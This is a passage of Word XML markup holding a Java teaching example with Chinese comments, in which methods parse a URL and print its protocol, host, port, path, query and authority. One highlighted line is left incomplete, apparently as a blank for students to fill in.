        <w:tab/>
        <w:t>in.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC5E881" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} catch (IOException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02756B2B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// TODO Auto-generated catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9CFCFA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA1F10B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A904E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2D8D1F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8BC67C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4A765C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AB963E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAF94CD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>static void getContent(String url) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC52DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E33D2AE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>URL u=new URL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25265AB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println(u.getPort());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7301E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>Object ob=u.getContent();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D22E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>System.out.println("i get a "+ob.getClass().toString());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D10142" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>} catch (Exception e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A3F28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// TODO Auto-generated catch block</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC5B6E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>e.printStackTrace();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720584F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C9FC06" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D6505D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D5E5FD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE4EB75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C29CB76" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>static void getURLDetails(String url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F2D2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66252A35" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD10DB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>URL u=new URL(url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0107225C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   System.out.println(u);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BDDBD9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">   System.out.println"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件类型：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"+);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A7BEB1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">       System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的协议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + u.getProtocol()); //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面的超文本协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654B6DBE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       //System.out.println("The user info is " + u.getUserInfo());//</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BE07AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38BEFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>String host = u.getHost();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E035BD4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        if (host != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6BA25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          int atSign = host.indexOf('@');  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7FE705" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          if (atSign != -1) host = host.substring(atSign+1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE92E5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" + host);   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E61A23" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        } else {          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D855402" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">          System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机名称：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> null.");   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF49968" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AE0BF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="080DCCD7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + u.getDefaultPort());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1477F9DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>默认端口：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" + u.getDefaultPort());</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B9A877" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + u.getPath());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4280CFDF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定位位置：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + u.getRef());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B37467" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + u.getQuery());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19857DD2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件名及请求参数：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" + u.getFile());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31389212" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证信息：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" + u.getAuthority());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62487987" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">      } catch (MalformedURLException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116B2AB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        System.err.println(url + " is not a URL I understand.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5751FC21" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F42556D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
